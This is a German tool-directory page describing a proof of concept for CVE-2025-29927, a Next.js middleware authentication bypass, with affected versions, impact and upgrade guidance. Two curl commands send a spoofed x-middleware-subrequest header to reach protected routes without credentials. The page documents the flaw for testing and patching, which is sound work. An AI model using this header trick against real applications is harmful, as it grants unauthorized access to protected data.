Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927 — Proof-of-concept-Exploit für CVE-2025-29927, der die Authentifizierungsumgehung in Next.js-Middleware über den x-middleware-subrequest-Header demonstriert, mit betroffenen Versionen und Schadensbegrenzungsanleitung. | Kitploit
Tools/GitHubGitHub/toddkk02/cve-2025-29927
Authentifizierung & AutorisierungSchwachstellenanalyseIDS/IPS-UmgehungWebanwendungs-ExploitationCTFPenetrationstests
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

Proof-of-concept-Exploit für CVE-2025-29927, der die Authentifizierungsumgehung in Next.js-Middleware über den x-middleware-subrequest-Header demonstriert, mit betroffenen Versionen und Schadensbegrenzungsanleitung.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29927 — Next.js Middleware-Authentifizierungsbypass

Übersicht

Stell dir einen Türsteher vor dem Club vor, aber wenn du ihm sagst „Ich bin schon drin“, lässt er dich ohne Kontrolle passieren. Genau das ist CVE-2025-29927.

Middleware in Next.js wird vor der Verarbeitung einer Anfrage ausgeführt, was sie zum idealen Ort für die Authentifizierungsverwaltung macht. Next.js verwendet einen internen x-middleware-subrequest-Header, um rekursive Anfragen zu verhindern und Endlosschleifen zu vermeiden. Diese Schwachstelle zeigt, dass es möglich ist, die Middleware-Ausführung vollständig zu umgehen oder zu überspringen – einschließlich kritischer Sicherheitsprüfungen wie der Authentifizierung, bevor eine geschützte Route erreicht wird.


Betroffene Versionen

BranchBehoben in
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

Anfällige Anwendungen

  • Anwendungen, die Next.js hosten und Middleware verwenden
  • Anwendungen, die für Authentifizierungs- und Sicherheitsprüfungen auf Middleware angewiesen sind, ohne später im Anwendungsstapel zu validieren

Nicht betroffen

  • Anwendungen, die auf Vercel gehostet werden
  • Anwendungen, die auf Netlify gehostet werden
  • Anwendungen, die als statische Exporte veröffentlicht werden (Middleware wird nicht ausgeführt)

Auswirkungen

Tausende oder Millionen von Anwendungen laufen auf nicht gepatchten Next.js-Versionen. Wenn nicht entschärft, ermöglicht diese Schwachstelle jedem unauthentifizierten Zugriff auf geschützte Routen – ohne erforderliche Anmeldedaten.


Proof of Concept

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

Die Antwort gibt die geschützte Seite ohne jegliche Authentifizierung zurück.

Ich habe diese Schwachstelle in einer echten CTF-Umgebung ausgenutzt

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

Behebung

Aktualisiere Next.js auf eine gepatchte Version:

  • 15.x → 15.2.3 oder höher
  • 14.x → 14.2.25 oder höher
  • 13.x → 13.5.9 oder höher
Tool herunterladen